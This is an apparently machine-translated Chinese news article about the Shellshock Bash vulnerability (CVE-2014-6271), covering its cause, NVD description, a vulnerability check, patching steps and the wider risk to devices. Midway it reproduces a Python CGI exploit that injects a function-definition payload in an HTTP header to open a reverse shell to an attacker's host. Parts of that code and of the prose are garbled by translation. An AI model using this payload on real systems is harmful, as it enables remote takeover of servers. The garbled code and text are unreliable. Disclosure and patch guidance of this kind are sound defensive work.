Bash错误是整个互联网基础架构的危急风险

Bash Bug是一种远程可利用的关键漏洞,影响Linux,UNIX和Apple Mac OS X,这威胁到全球Internet基础架构。

b1

一个新的关键漏洞在Linux和Unix命令行shell中被称为Bash错误,又名GNU Bourne再次展示,正在威胁IT世界。缺陷,编码为  CVE-2014-6271 ,是远程利用和影响Linux和Unix命令行的漏洞可能暴露于网络攻击网站,服务器,PC,OS X Mac的风险,各种各样  家庭路由器 以及许多其他设备。

Stephane Chazelas公开披露了Bash中远程代码执行漏洞的技术细节,这会影响全球的大多数Linux发行版和服务器。

Stephane解释说,它已经存在几十年的漏洞,它与Bash处理专门格式化的环境变量的方式相关,即导出的shell函数。

要在受影响的系统上运行任意代码,必须将函数分配给变量,将执行函数定义中的尾随代码。

关键的Bash错误漏洞,也称为shellShock,影响到从1.14到4.3的GNU Bash版本的版本,威胁演员可以利用它在使用专制的变量的目标计算机上远程执行shell命令。

“GNU BASH到4.3在环境变量值中的函数定义后进入尾随字符串,这允许远程攻击者通过制作环境执行任意代码,如涉及OpenSSH SSHD中的ForceCommand功能中的向量,opache中的mod_cgi和mod_cgid模块所示HTTP服务器,由未指定的DHCP客户端执行的脚本以及从BASH执行中横跨特权边界发生的设置环境的其他情况。”在NIST国家漏洞数据库上说明Bubb Bug漏洞,其严重程度为10分中10分。

每次应用程序通过HTTP或公共网关接口(CGI)调用Bash Shell命令(例如邮件服务器)时,可以轻易地阻止具有Bash的机器。攻击者可以通过在Web请求中设置标题或设置奇怪的MIME类型来发送特殊制作的恶意Web请求,或通过设置奇怪的MIME类型来在服务器上运行任意代码。在互联网上搜索可以找到下面报告的CGI-BIN反向shell的源代码:

 

#bash错误

# CVE-2014-6271 Bincgi-逆壳

#

导入,httpliburllibsys

if(len(sys.argv)<4):

打印“Usage: %s <host> <vulnerable CGI> <attackhost/IP>” % sys.argv[0]

打印“示例:%s localhost /cgi-bin/test.cgi 10.0.0.1/8080″ % sys.argv[0]

退出(0)

 

conn = httplib。(sys。[httpconnectionargv1])

Revere_Shell =.”(){忽略;}; / bin / bash -i>& /dev/tcp/%s 0>&1” % sys.argv[3]

 

标题= {“Content-type”: “Application / X-WWW-Form-Urlencoded”,

“test”:reverse_shell }

conn.request(“GET”,sys.argv [2],标题=标题)

res = conn.getResponse()

打印res.status, res.reason

data = res.read()

打印data

通过OpenSSH可以进行类似的攻击,“我们还验证了此漏洞在SSH中暴露 - 但仅限于经过身份验证的会话。像CGI脚本这样的Web应用程序可能会根据许多因素易受攻击;包括通过shell调用其他应用程序,或通过shell评估代码部分。“ Stephane警告说。但如果攻击者没有SSH帐户,则这种漏洞将无法正常工作。

Bash错误漏洞的整体影响是广泛扩展的,Bash通常用于从其他程序执行命令。安全专家比较Bash Bug暴露的风险   Heldbled.  bug.

“第一个原因是,错误以意想不到的方式与其他软件交互。我们知道与shell互动是危险的,但我们写的代码无论如何。一种巨大的软件百分比以某种方式与壳牌互动。因此,我们’LL从来没有能够在那里易受Bash错误的所有软件编制。”罗伯特格雷厄姆国家在他的博客上  勘误安全 .

要评估Linux或UNIX系统是否易受攻击,用户可以运行提出的诊断测试  红色的帽子

$ env x ='(){:;}; echo脆弱’ bash -c “echo this is a test”

如果上述命令的输出如下所示:

易受攻击这是一个测试

您使用的是Bash的易受攻击的版本。用于修复此问题的补丁可确保BASH函数结束后不允许代码。因此,如果使用修补版的Bash运行上面的示例,则应获得类似于:

$ env x ='(){:;}; echo脆弱’ bash -c “echo this is a test”Bash:警告:X:忽略函数定义尝试Bash:错误导入函数定义(x)’ this is a test

如果您的系统易受攻击,请通过运行以下命令将问题更新修复到最新版本的Bash包:

#yum更新bash

 

要缓解BASH错误,建议禁用任何CGI脚本在Shell上呼叫,并尽快升级您的Bash软件包,主体Linux发行供应商已发布新的Bash软件版本:

  • Red Hat Enterprise Linux(版本4到7)和Fedora发行版
  • Centos.  (版本5到7)
  • Ubuntu.  10.04 LTS,12.04 LT,14.04 LTS
  • debian.

Bug Bash缺陷对此特别危险  物联网  像智能电表,路由器,Web摄像机和任何运行软件的设备等设备,该设备允许Bash脚本。通常,这种软件不容易被修补,更有可能暴露互联网中的临界缺陷。

据格雷厄姆说“与Heftbley不同,只影响了一个特定版本的Openssl,这个Bash Bug已经存在了很长时间。这意味着网络上有很多旧设备容易受到此错误。需要修补的系统数量,但赢得了’t成为,远远大于Heldbleed。”

皮奈里格帕加尼尼

全球infosec奖项2021

我们在第9年,这些奖项非常受欢迎 - 帮助建立嗡嗡声,客户意识,销售和营销增长机会,投资机会等等。

现在申请